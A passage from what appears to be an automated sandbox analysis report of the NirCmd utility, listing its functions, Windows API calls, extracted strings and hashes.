                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoStartup
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2571198056-0
                                                                                                                                                          • Opcode ID: 964fe2810de94703988e09a15cc3809d5fc57ac51d3a1a1acd64eae86d3084c2
                                                                                                                                                          • Instruction ID: ac02b751b0601268f0d4c90d11333cd68f9c928c3dfc6917735b9e7b55c74a0b
                                                                                                                                                          • Opcode Fuzzy Hash: 964fe2810de94703988e09a15cc3809d5fc57ac51d3a1a1acd64eae86d3084c2
                                                                                                                                                          • Instruction Fuzzy Hash: 3E311471604A41C6E762AF26E8847E837B0F3487E5F404216FB694B2F5DB3AC945C700
                                                                                                                                                          Function 000000014000423A Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogFreeLibraryParam
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1367371229-0
                                                                                                                                                          • Opcode ID: 7804e4c2e36f454ba8ac1d938394113bc91bb3f52a01db88a517f02848141e59
                                                                                                                                                          • Instruction ID: c9cb731f711de10aa55871dec2e3f99669ffb9b02c2a48162954d734993dfad3
                                                                                                                                                          • Opcode Fuzzy Hash: 7804e4c2e36f454ba8ac1d938394113bc91bb3f52a01db88a517f02848141e59
                                                                                                                                                          • Instruction Fuzzy Hash: 6201F2F1319A80A3EB23DB52E8817E93364FB8C784F800512BB4D5B5B6DB79D549CB08

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 000000014000C0FA Relevance: 267.4, APIs: 109, Strings: 43, Instructions: 1423windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharMultiWidememset$BeepInitializeMessageUninitialize_stricmpatof
                                                                                                                                                          • String ID: $%s: Failed to load the library$%s: Failed to load the registration function$%s: Succeed$*clipboard*$Control Panel\Desktop\WindowMetrics$Failed the install the specified assembly$Shell Icon BPP$convertimage$convertimages$deskrefresh$dlg$dlgany$file$filldelete$gac$help$http://nircmd.nirsoft.net$http://nircmd.nirsoft.net/%s.html$install$noerrorui$nosecattr$open$regsvr$rem$returnval$savescreenshot$savescreenshotfull$savescreenshotwin$setdefaultsounddevice$shellcopy$shellrefresh$showsounddevices$silent$speak$stdbeep$sysrefresh$sysrefreshcolor$sysrefreshfont$trayballoon$unreg$xml$yestoall
                                                                                                                                                          • API String ID: 3586644319-2222694224
                                                                                                                                                          • Opcode ID: 964c37668f09d50b32f82033f07a87f0fd50857f906c75ee9656b08f5da58a6c
                                                                                                                                                          • Instruction ID: cb960aa0136083dd2c122111bc65f33d5fb09cb8004e601d9c21c372fbcd879c
                                                                                                                                                          • Opcode Fuzzy Hash: 964c37668f09d50b32f82033f07a87f0fd50857f906c75ee9656b08f5da58a6c
                                                                                                                                                          • Instruction Fuzzy Hash: 9AE27EB2608AC486EB26DB22F4557DEB361F78C7C4F504115EB9A4BAA6DF3DC149CB00
                                                                                                                                                          Function 00000001400066A8 Relevance: 82.7, APIs: 36, Strings: 11, Instructions: 469stringclipboardtimeCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 758 1400066a8-1400066dc 759 1400066e2 758->759 760 140006e77-140006e9d 758->760 761 1400066e7-1400066eb 759->761 762 1400066f1-1400066fd 761->762 763 140006e53-140006e56 761->763 764 140006702-140006705 762->764 765 1400066ff 762->765 766 140006e5a 763->766 767 140006707-140006716 764->767 768 14000671b-140006722 764->768 765->764 769 140006e5e-140006e68 766->769 767->769 770 140006724 768->770 771 140006727-14000672a 768->771 769->760 772 140006e6a-140006e71 769->772 770->771 773 14000676a-140006771 771->773 774 14000672c-140006765 strtoul 771->774 772->760 772->761 775 140006773 773->775 776 140006776-140006779 773->776 774->766 775->776 777 140006787-14000678e 776->777 778 14000677b 776->778 780 140006793-140006796 777->780 781 140006790 777->781 779 14000677e-140006782 778->779 779->766 782 140006798-14000679b 780->782 783 14000679d-1400067a0 780->783 781->780 782->779 784 1400067a2-1400067a5 783->784 785 1400067be-1400067cb 783->785 784->785 787 1400067a7-1400067ac 784->787 786 1400067db-1400067de 785->786 788 1400067cd-1400067cf 786->788 789 1400067e0-1400067e3 786->789 790 1400067b1-1400067b4 787->790 791 1400067ae 787->791 793 1400067d1-1400067d8 788->793 794 1400067e7-1400067ed 788->794 789->794 790->763 792 1400067ba-1400067bc 790->792 791->790 792->779 793->786 794->763 795 1400067f3-140006831 memcpy _strnicmp 794->795 796 140006833-14000686b memset call 140007950 795->796 797 1400068ab-1400068c8 _strnicmp 795->797 796->769 809 140006871-140006881 strlen 796->809 799 1400068ca-140006914 memset call 140015c42 strlen 797->799 800 14000693e-14000695b _strnicmp 797->800 799->769 810 14000691a-140006925 799->810 802 140006961-1400069b9 memset GetDateFormatA strlen 800->802 803 1400069e3-140006a00 _strnicmp 800->803 802->769 806 1400069bf-1400069ca 802->806 807 140006a06-140006a5e memset GetTimeFormatA strlen 803->807 808 140006a88-140006aa5 _strnicmp 803->808 806->769 811 1400069d0-1400069de 806->811 807->769 812 140006a64-140006a6f 807->812 814 140006b06-140006b23 _strnicmp 808->814 815 140006aa7-140006ae2 memset GetEnvironmentVariableA 808->815 809->769 813 140006887-140006892 809->813 810->769 818 14000692b-140006939 810->818 819 140006da8-140006db3 memcpy 811->819 812->769 820 140006a75-140006a83 812->820 813->769 821 140006898-1400068a6 813->821 816 140006b29-140006b5d memset call 140015b94 814->816 817 140006bad-140006bca _strnicmp 814->817 815->769 822 140006ae8-140006af3 815->822 816->769 833 140006b63-140006b89 GetModuleFileNameA strlen 816->833 824 140006d12-140006d2f _strnicmp 817->824 825 140006bd0-140006be7 call 140003860 817->825 818->819 819->769 820->819 821->819 822->769 826 140006af9-140006b01 822->826 829 140006d35-140006d45 call 140015c12 824->829 830 140006db8-140006dd5 _strnicmp 824->830 839 140006c08 825->839 840 140006be9-140006bf0 825->840 827 140006da3-140006da5 826->827 827->819 829->769 844 140006d4b-140006d51 829->844 830->769 832 140006ddb-140006de6 OpenClipboard 830->832 832->769 836 140006de8-140006df9 GetClipboardData 832->836 833->769 837 140006b8f-140006b9a 833->837 841 140006e4b-140006e51 CloseClipboard 836->841 842 140006dfb-140006e0a GlobalLock 836->842 837->769 843 140006ba0-140006ba8 837->843 846 140006c0b-140006c0e 839->846 840->839 845 140006bf2-140006c06 840->845 841->769 847 140006e46 842->847 848 140006e0c-140006e17 call 140015bac 842->848 843->827 849 140006d72 844->849 850 140006d53-140006d5a 844->850 845->846 851 140006c14-140006c82 call 1400038f8 call 140001640 846->851 852 140006d7e-140006d89 strlen 846->852 847->841 862 140006e19-140006e28 848->862 863 140006e3d-140006e40 GlobalUnlock 848->863 856 140006d75-140006d78 849->856 850->849 855 140006d5c-140006d70 850->855 866 140006c84-140006ccd call 140003794 * 2 strlen 851->866 867 140006cef-140006d0d call 1400038d0 * 2 call 140001494 851->867 852->769 857 140006d8f-140006d9a 852->857 855->856 856->769 856->852 857->769 860 140006da0 857->860 860->827 862->863 865 140006e2a-140006e3a memcpy 862->865 863->847 865->863 866->867 877 140006ccf-140006cda 866->877 867->769 877->867 879 140006cdc-140006cec memcpy 877->879 879->867
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _strnicmp$memsetstrlen$Clipboardmemcpy$FormatGlobal$CloseDataDateLockOpenTimeUnlockstrtoul
                                                                                                                                                          • String ID: clipboard$currdate.$currtime.$exefile$f$folder.$fparam.$loopcount$nir.$param.$sys.
                                                                                                                                                          • API String ID: 2395358083-3933613765
                                                                                                                                                          • Opcode ID: 6869a6a5ddc59649c6e8b957e798ea409b1791c3c071c62413d80a6959d5d520
                                                                                                                                                          • Instruction ID: b65225af348f11d7c05ac22ffa345657cb140650ec1c380d7be534c0bcfef4d0
                                                                                                                                                          • Opcode Fuzzy Hash: 6869a6a5ddc59649c6e8b957e798ea409b1791c3c071c62413d80a6959d5d520
                                                                                                                                                          • Instruction Fuzzy Hash: 6E12C6F13086C086EB36DB26E4903ED6792F7587C4F804415E79A9B6F9EB3AC545C701
                                                                                                                                                          Function 0000000140001000 Relevance: 64.9, APIs: 28, Strings: 9, Instructions: 183windowstringfileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Item$Text$MessageWindow$ChildColorCursorFileFromPoint$BrushCopyCreateDeleteDialogDirectoryExecuteFontIndirectLoadModeModuleNameObjectSendShellWindowsmemcpymemsetstrcatstrcpy
                                                                                                                                                          • String ID: Error$Failed to copy NirCmd !$If you copy NirCmd utility into your Windows directory, you'll be able to use NirCmd without specifying the full path of nircmd.exeDo you want to copy NirCmd into your Windows directory ?$MS Sans Serif$NirCmd$NirCmd v2.87Copyright (c) 2003 - 2024 Nir SoferFor more information about using this utility, read the help file - nircmd.chm$https://www.nirsoft.net$nircmd.exe$open
                                                                                                                                                          • API String ID: 569691912-1014164278
                                                                                                                                                          • Opcode ID: 986588bf4e7f21102152e0aeb5af57c2cda049d6adc8fee736b9f72736bb4b5b
                                                                                                                                                          • Instruction ID: 13bd948e167c00f18b3c0a2367b685ed5e7cf2b8a61955dc7aca42bc5ab29d9d
                                                                                                                                                          • Opcode Fuzzy Hash: 986588bf4e7f21102152e0aeb5af57c2cda049d6adc8fee736b9f72736bb4b5b
                                                                                                                                                          • Instruction Fuzzy Hash: D9915B71208A8186EB62DF26E8547DA7761F78CBC4F805015FB4A4BAB8DF7DC64AC740
                                                                                                                                                          Function 00000001400057E0 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 206stringprocessthreadCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: memset$CloseHandleProcess$WindowWindowsstrlen$ByteCharCreateDirectoryEnumFindFreeLibraryMessageMultiOpenPostThreadWidestrcatstrcpy
                                                                                                                                                          • String ID: Explorer.exe$Progman$Shell_TrayWnd$h$h
                                                                                                                                                          • API String ID: 2721877098-3944673889
                                                                                                                                                          • Opcode ID: 68bfc29b79b0b99c3d1756627be255785a6f4bdff29bda250d2e6fbda140ab00
                                                                                                                                                          • Instruction ID: f08d8362585dc043cf17baf8715f9e4c78095134fdd35584d41bc62820cc573f
                                                                                                                                                          • Opcode Fuzzy Hash: 68bfc29b79b0b99c3d1756627be255785a6f4bdff29bda250d2e6fbda140ab00
                                                                                                                                                          • Instruction Fuzzy Hash: 0AA13972218A8086E722EB16F8907DFB7A5F789B81F804115EB8D47AA9DF79C545CB00
                                                                                                                                                          Function 00000001400080E0 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 203COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Library$AddressProc$CloseFreeHandle$Load$ErrorLastfreememset$ProcessProcess32_mbsicmp$ByteCharCreateCurrentFirstMultiNextOpenSnapshotToolhelp32Widestrtoul
                                                                                                                                                          • String ID: SeDebugPrivilege$h
                                                                                                                                                          • API String ID: 1526464300-4193718954
                                                                                                                                                          • Opcode ID: b3742b4eee962b4fea5c1e16d5c734bf6f25c78616092017d48553cbebc1b3b0
                                                                                                                                                          • Instruction ID: 19b8bec7b8aff4e99c1af703dcee8b8679d7cbc5b584f4d9b24f253c7b53fdc6
                                                                                                                                                          • Opcode Fuzzy Hash: b3742b4eee962b4fea5c1e16d5c734bf6f25c78616092017d48553cbebc1b3b0
                                                                                                                                                          • Instruction Fuzzy Hash: 3D912A72619AD086E772DB16F4407DEB3A5F788BD0F444026FBC947AAACF78C5468B01
                                                                                                                                                          Function 000000014000A4C4 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 159stringfileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: memset$ByteCharFileMultiWide$CopyModuleName_onexitsprintfstrcatstrcpy
                                                                                                                                                          • String ID: NetApiBufferFree$NetRemoteTOD$NetScheduleJobAdd$admin$\nircmd.exe$nircmd.exe %s
                                                                                                                                                          • API String ID: 822963163-2025064379
                                                                                                                                                          • Opcode ID: 78957874fb8913a0dd188896a5f6b4e070945d977c663c8ae0e5007aee67e2ba
                                                                                                                                                          • Instruction ID: 0fd58e8ad6ae86e70ef3585df336a80c279d4457b32d3090bb9d04429dcf90b4
                                                                                                                                                          • Opcode Fuzzy Hash: 78957874fb8913a0dd188896a5f6b4e070945d977c663c8ae0e5007aee67e2ba
                                                                                                                                                          • Instruction Fuzzy Hash: EA715E72218B8091EB26DB16E8903D9B7A1F79D384F844126FB4D4B6B9EF7DC109C700
                                                                                                                                                          Function 00000001400054D8 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 143libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: memset$ByteCharMultiWide$ErrorLastLibrary$AddressFreeLoadProc
                                                                                                                                                          • String ID: CreateProcessWithLogonW$advapi32.dll
                                                                                                                                                          • API String ID: 969872975-2238408776
                                                                                                                                                          • Opcode ID: acc55802c27003b7c75fe18ddc28fa3fd5ba5fb11ce05fed2a6f20d645a7d98d
                                                                                                                                                          • Instruction ID: b6013b693067b07c3bd014090eddd6fdb69cb4ab41e4d4b04c182be996e15c2d
                                                                                                                                                          • Opcode Fuzzy Hash: acc55802c27003b7c75fe18ddc28fa3fd5ba5fb11ce05fed2a6f20d645a7d98d
                                                                                                                                                          • Instruction Fuzzy Hash: D0518A72208B8191EB31EF56F8407DBA6A1F7897C4F884125EF8D47BA9DB3EC1058B04
                                                                                                                                                          Function 0000000140012A40 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 129processlibrarystringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$Handle$CloseProcess32memsetstrcpy$CreateFirstLibraryLoadModuleNextOpenProcessSnapshotToolhelp32freememcpystrchr
                                                                                                                                                          • String ID: :$QueryFullProcessImageNameA$kernel32.dll
                                                                                                                                                          • API String ID: 1693480479-1018829621
                                                                                                                                                          • Opcode ID: af33695f128de4a922d7a48133877e5add3c8bd6dae1c6a15b741d68b5fd9b91
                                                                                                                                                          • Instruction ID: ed4add2408e7d2798f28484c714db48a57a3b38b9a2436512873fd856bfacb69
                                                                                                                                                          • Opcode Fuzzy Hash: af33695f128de4a922d7a48133877e5add3c8bd6dae1c6a15b741d68b5fd9b91
                                                                                                                                                          • Instruction Fuzzy Hash: B55138722086C0D6EB36DB26E4847DAB7A5F78C7C0F444015EB8A0BAA9DB7EC555CB00
                                                                                                                                                          Function 0000000140007DE4 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 161libraryprocessloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0000000140011D84: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,0000000140011A42,?,?,?,?,?,?,?,?), ref: 0000000140011D9B
                                                                                                                                                            • Part of subcall function 0000000140011D84: LoadLibraryA.KERNEL32(?,?,?,?,?,?,0000000140011A42,?,?,?,?,?,?,?,?), ref: 0000000140011DAD
                                                                                                                                                            • Part of subcall function 0000000140011D84: GetProcAddress.KERNEL32(?,?,?,?,?,?,0000000140011A42,?,?,?,?,?,?,?,?), ref: 0000000140011DC9
                                                                                                                                                            • Part of subcall function 0000000140011D84: FreeLibrary.KERNEL32(?,?,?,?,?,?,0000000140011A42,?,?,?,?,?,?,?,?), ref: 0000000140011DE6
                                                                                                                                                            • Part of subcall function 0000000140011D84: LoadLibraryA.KERNEL32(?,?,?,?,?,?,0000000140011A42,?,?,?,?,?,?,?,?), ref: 0000000140011DFB
                                                                                                                                                            • Part of subcall function 0000000140011D84: GetProcAddress.KERNEL32(?,?,?,?,?,?,0000000140011A42,?,?,?,?,?,?,?,?), ref: 0000000140011E13
                                                                                                                                                            • Part of subcall function 0000000140011D84: FreeLibrary.KERNEL32(?,?,?,?,?,?,0000000140011A42,?,?,?,?,?,?,?,?), ref: 0000000140011E2D
                                                                                                                                                            • Part of subcall function 0000000140011D84: LoadLibraryA.KERNEL32 ref: 0000000140011E4F
                                                                                                                                                            • Part of subcall function 0000000140011D84: GetProcAddress.KERNEL32 ref: 0000000140011E67
                                                                                                                                                            • Part of subcall function 0000000140011D84: FreeLibrary.KERNEL32 ref: 0000000140011E90
                                                                                                                                                            • Part of subcall function 0000000140011D84: GetLastError.KERNEL32 ref: 0000000140011E96
                                                                                                                                                            • Part of subcall function 0000000140011D84: CloseHandle.KERNEL32 ref: 0000000140011EA3
                                                                                                                                                            • Part of subcall function 0000000140001438: LoadLibraryA.KERNEL32 ref: 000000014000144E
                                                                                                                                                            • Part of subcall function 0000000140001438: GetProcAddress.KERNEL32 ref: 0000000140001461
                                                                                                                                                            • Part of subcall function 0000000140001438: GetModuleHandleA.KERNEL32 ref: 0000000140001472
                                                                                                                                                            • Part of subcall function 0000000140001438: GetProcAddress.KERNEL32 ref: 0000000140001482
                                                                                                                                                          • FreeLibrary.KERNEL32 ref: 0000000140007E4A
                                                                                                                                                          • LoadLibraryA.KERNEL32 ref: 0000000140007F1C
                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0000000140007F33
                                                                                                                                                          • memset.MSVCRT ref: 0000000140007F69
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0000000140008008
                                                                                                                                                          • FreeLibrary.KERNEL32 ref: 0000000140008021
                                                                                                                                                          • memset.MSVCRT ref: 000000014000803A
                                                                                                                                                          • CreateProcessA.KERNEL32 ref: 00000001400080A0
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00000001400080AB
                                                                                                                                                          • FreeLibrary.KERNEL32 ref: 00000001400080BD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Library$AddressFreeProc$Load$ErrorLast$HandleProcessmemset$CloseCreateCurrentModule
                                                                                                                                                          • String ID: CreateEnvironmentBlock$SeTcbPrivilege$Userenv.dll$h
                                                                                                                                                          • API String ID: 444500478-1648149317
                                                                                                                                                          • Opcode ID: 72cc7c1ee5d1ed25eb15cd1e7c5b69051f98adf0288a1454822f2fb17b2dbafd
                                                                                                                                                          • Instruction ID: ef5eb6909e403afc12ee13635b3aa0ef608deb661ccee83677e4f7ab1a00e557
                                                                                                                                                          • Opcode Fuzzy Hash: 72cc7c1ee5d1ed25eb15cd1e7c5b69051f98adf0288a1454822f2fb17b2dbafd
                                                                                                                                                          • Instruction Fuzzy Hash: 7E71E672209B8095E7B2DB12F840BDAB3A5F78C780F904116EB8D47B68DF39C959DB00
                                                                                                                                                          Function 0000000140001BBC Relevance: 21.1, APIs: 14, Instructions: 102clipboardfileregistryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClipboardFile$GlobalRead$Close$AllocCreateDataEmptyFormatHandleLockOpenPointerRegisterUnlockmemset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 483902583-0
                                                                                                                                                          • Opcode ID: 271f88af39ef712f2069322313a79b1227e5a94b0b85de0d22cd452094de7dab
                                                                                                                                                          • Instruction ID: c69f690c0d40c9222e839b8eed1170a8b1890575274e8487ee0b18f5c7c8be1b
                                                                                                                                                          • Opcode Fuzzy Hash: 271f88af39ef712f2069322313a79b1227e5a94b0b85de0d22cd452094de7dab
                                                                                                                                                          • Instruction Fuzzy Hash: 8E416A72224A4092EB6ADF23E848BDA6361F788BD5F405116FF5A07AA4DF3DC549CB10
                                                                                                                                                          Function 0000000140004490 Relevance: 19.7, APIs: 13, Instructions: 162COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DisplayEnummemcpymemset$Devicesfree$ErrorLastMonitorsSettings_mbsicmp
                                                                                                                                                          • String ID:
